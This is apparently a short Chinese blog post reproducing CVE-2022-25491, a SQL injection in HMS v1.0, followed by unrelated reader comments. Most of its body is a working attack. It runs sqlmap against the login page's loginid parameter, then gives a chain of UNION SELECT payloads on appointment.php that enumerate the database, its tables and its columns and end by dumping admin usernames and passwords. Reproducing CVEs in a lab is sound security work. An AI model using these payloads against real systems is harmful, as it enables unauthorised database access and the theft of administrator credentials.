【初级】HMS v1.0 SQL注入好想告诉你2年前更新关注私信6828 CVE-2022-25491 影响版本:HMS v1.0 描述:HMS v1.0 被发现包含通过 adminlogin.php、Patientlogin.php 的 SQL 注入漏洞 攻击思路 注入点(1): 在登陆界面进行抓包 注意loginid参数,这是注入点直接上sqlma跑,这是个POST注入,要先导出到txt里面sqlmap -r 1.txt -p loginid – > -p 指定参数 跑出数据库--dbs 跑出表名-D hms--tables 注入点(2):/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,10 %23 -> 10是回显点 /appointment.php?editid=-1'union%20select 1,2,3,4,5,6,7,8,9,database() %23 -> 查看当前数据库 /appointment.php?editid=-1'union%20select 1,2,3,4,5,6,7,8,9,(select group_concat(table_name) from information_schema.tables where%20table_schema=database()) %23-> 查看所有表/appointment.php?editid=-1'union%20select 1,2,3,4,5,6,7,8,9,(select group_concat(column_name) from information_schema.columns where%20table_schema=database() and table_name='admin') %23 -> 查看当前数据库所有列/appointment.php?editid=-1' union select 1,2,3,4,5,6,7,8,9,(select group_concat(username,password) from admin) %23–> 查看admin表中数据数据表太多,不知道flag在哪 © 版权声明部分文章采集于互联网,若侵权请联系删除!THE ENDCVE复现最近更新 喜欢就支持一下吧点赞8赏点小钱 分享QQ空间微博QQ好友海报分享复制链接收藏
cesfe 1个月前0
好的,谢谢昶之琴 1个月前0
这个安装地址失效了,我在网上找了一个:https://xiazai.zol.com.cn/detail/35/344340.shtml 如果还是不行的话就需要您自己去网上找找了cesfe 1个月前0
帆软部署 ,访问的地址访问不到昶之琴 2年前0
我以为只要提交就行了好想告诉你 2年前0
花巨资看一下